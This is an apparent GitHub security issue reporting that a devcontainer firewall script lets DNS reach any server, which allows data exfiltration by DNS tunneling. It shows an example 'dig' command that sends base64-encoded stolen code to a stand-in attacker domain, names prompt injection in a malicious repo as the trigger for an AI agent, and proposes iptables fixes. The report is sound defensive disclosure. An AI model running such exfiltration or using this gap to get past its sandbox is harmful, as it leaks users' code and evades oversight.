Devcontainer firewall allows DNS to arbitrary servers — enables data exfiltration via DNS tunneling

Resolved 💬 4 comments Opened Mar 21, 2026 by ilang Closed Apr 18, 2026

Summary

The devcontainer's init-firewall.sh allows outbound DNS (UDP port 53) to any destination. This enables DNS tunneling, which completely bypasses the IP-based firewall.

The issue

# init-firewall.sh, current rules:
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
iptables -A INPUT -p udp --sport 53 -j ACCEPT

These rules allow DNS queries to any server, not just Docker's internal resolver. An attacker (via prompt injection in a malicious repo) could exfiltrate data through DNS queries:

dig @attacker-dns-server.com $(echo "stolen-code" | base64).attacker.com

This works because the firewall only blocks TCP/HTTPS connections to non-whitelisted IPs — DNS traffic is completely unrestricted.

Suggested fix

Restrict DNS to Docker's internal resolver at 127.0.0.11:

iptables -A OUTPUT -p udp --dport 53 -d 127.0.0.11 -j ACCEPT
iptables -A INPUT -p udp --sport 53 -s 127.0.0.11 -j ACCEPT
# Also allow TCP DNS (some large responses fall back from UDP to TCP)
iptables -A OUTPUT -p tcp --dport 53 -d 127.0.0.11 -j ACCEPT
iptables -A INPUT -p tcp --sport 53 -s 127.0.0.11 -j ACCEPT

This still allows all domain resolution (Docker proxies DNS internally) while preventing direct queries to external DNS servers.

Impact

This affects any user relying on the devcontainer firewall for security when running claude --dangerously-skip-permissions. The firewall's "deny-by-default" strategy is undermined by this unrestricted DNS path.

View original on GitHub ↗

This issue has 4 comments on GitHub. Read the full discussion on GitHub ↗